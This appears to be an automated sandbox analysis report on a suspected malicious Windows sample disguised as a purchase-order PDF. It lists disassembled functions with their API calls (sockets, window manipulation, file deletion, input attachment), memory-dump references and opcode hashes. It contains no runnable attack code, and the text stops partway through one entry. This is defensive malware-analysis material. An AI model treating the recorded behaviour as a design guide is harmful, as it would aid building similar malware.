                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CopyVariant$ErrorLast
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2286883814-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                                                                                                                                                                                                                                            • Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99
                                                                                                                                                                                                                                                                                                            Function 0047404B Relevance: 6.1, APIs: 4, Instructions: 133networkCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
                                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
                                                                                                                                                                                                                                                                                                            • #21.WSOCK32 ref: 004740E0
                                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 004740EB
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$socket
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1881357543-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                                                                                                                                                                                                                                                            • Instruction ID: ff1742a21ceaee7448286ece46cbaad1fa76dded649dcd1b12ff87c083dae87e
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7641D9717403006AE720BF6ADC47F5672C89B54B18F14496EF648BF2C3D6FAA881869C
                                                                                                                                                                                                                                                                                                            Function 00441CB4 Relevance: 6.1, APIs: 4, Instructions: 112windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                                                                                                                                                                                                                                            • PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00441DF2
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                                                                                                                                                                                                                                                            • Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5
                                                                                                                                                                                                                                                                                                            Function 0042384A Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
                                                                                                                                                                                                                                                                                                            • __isleadbyte_l.LIBCMT ref: 004238B2
                                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
                                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3058430110-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                                                                                                                                                                                                                                                            • Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55
                                                                                                                                                                                                                                                                                                            Function 0045D070 Relevance: 6.1, APIs: 4, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 0045D12B
                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
                                                                                                                                                                                                                                                                                                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0045D16A
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                                                                                                                                                                                                                                            • Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
                                                                                                                                                                                                                                                                                                            Function 0045058D Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 004505BF
                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Proc$Parent
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2351499541-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                                                                                                                                                                                                                                            • Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
                                                                                                                                                                                                                                                                                                            Function 004613E0 Relevance: 6.1, APIs: 4, Instructions: 90windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
                                                                                                                                                                                                                                                                                                            • __itow.LIBCMT ref: 00461461
                                                                                                                                                                                                                                                                                                            • __itow.LIBCMT ref: 004614AB
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$__itow$_wcslen
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2875217250-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                                                                                                                                                                                                                                                            • Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB
                                                                                                                                                                                                                                                                                                            Function 0040E1E0 Relevance: 6.1, APIs: 4, Instructions: 82windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0040E202
                                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: IconNotifyShell__memset
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 928536360-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                                                                                                                                                                                                                                                                                                            • Instruction ID: 9c6d99eda8392314e00a4319cd3b9f491a6d528882fc0aac3328a2d60ab56ec1
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC318170608701DFD320DF25D845B97BBF8BB45304F00486EE99A93380E778A958CF5A
                                                                                                                                                                                                                                                                                                            Function 004727F8 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 00472806
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32 ref: 00443F18
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
                                                                                                                                                                                                                                                                                                            • GetCaretPos.USER32(?), ref: 0047281A
                                                                                                                                                                                                                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 00472856
                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 0047285C
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2759813231-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                                                                                                                                                                                                                                                            • Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795
                                                                                                                                                                                                                                                                                                            Function 0047721A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0047728E
                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772A9
                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772C0
                                                                                                                                                                                                                                                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772D0
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
